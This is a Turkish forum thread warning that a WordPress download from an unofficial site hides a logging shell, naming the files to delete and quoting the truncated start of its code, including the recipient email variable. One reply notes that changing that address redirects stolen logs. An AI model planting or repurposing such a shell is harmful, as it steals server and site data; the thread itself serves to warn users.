Wordpress shell. Lütfen Dikkat.

Merhabalar,

Geçen internetim kesildi bende localhosta kurmaya karar verdim localhost sürümüm eski olduğu için gzinflate fonksiyonunu çalıştırmadı bende wordpress'te şifreleme olmadığını bildiğim için hemen dosyayı internet gelince kırdım, içinden shell çıktı ve indirdiğim site ise : Wordpress İndir -Türkiye Wordpress Download Destek Sitesi

SİZ SİZ OLUN BU SİTEDEN WORDPRESS İNDİRMEYİN! ŞUANDA ALLAH BİLİR 100LERCE HATTA 1000 LERCE KİŞİNİN FTP SİNDE BU SHELL VAR!

Nasıl Temizlerim ?
FTP'nize giriş yapın ve wp-includes/wp-header-menu.php silin.


EDİT : WP-ADMİN/index.php dosyasının en altındada mevcut..

Kod:
?><?php$kime="vbturka@gmail.com";$baslik="EL_MuHaM MeD Server Avcisi V1.0";$EL_MuHaMMeD="D

arkadaşım suç sende wordpress.org var tr.wordpress varken başka siteye niye itibar edersiniz

bence hiç uyarmasaydınız resmi site dururken çakma siteden indiren kişi hacklenmeyi de hakediyordur

bilgi vermek için yazmıştım ben resmi sitesini kullanıyorum.

konuyu arazştırdım ve herkez el muhammede suç bulmuş
bu yapılan aslında log tutan bir shell shell adıda EL_MuHaM MeD Server Avcisi V1.0

bu logu entegre ettiğimiz scriptlerin bilgilerini çekiyor ve bunu kodlayan elmuhammed olsada başkalarıda kullanıyordur.
sonuçta fark ederseniz
$kime="vbturka@gmail.com";
ordaki mail adresini değiştirirsek yani onu silip örnek kendi mailimi yazsam log bana gelir değilmi yani lütfen orada elmuhammed yazıyor diye onu suçlamayalım sonuçta kodlayan ile kullanan arasında dağ gibi fark var.

bu hacker vbulletin sistemlerede bu shelli koyuyor .

wptr'ye bildirildi.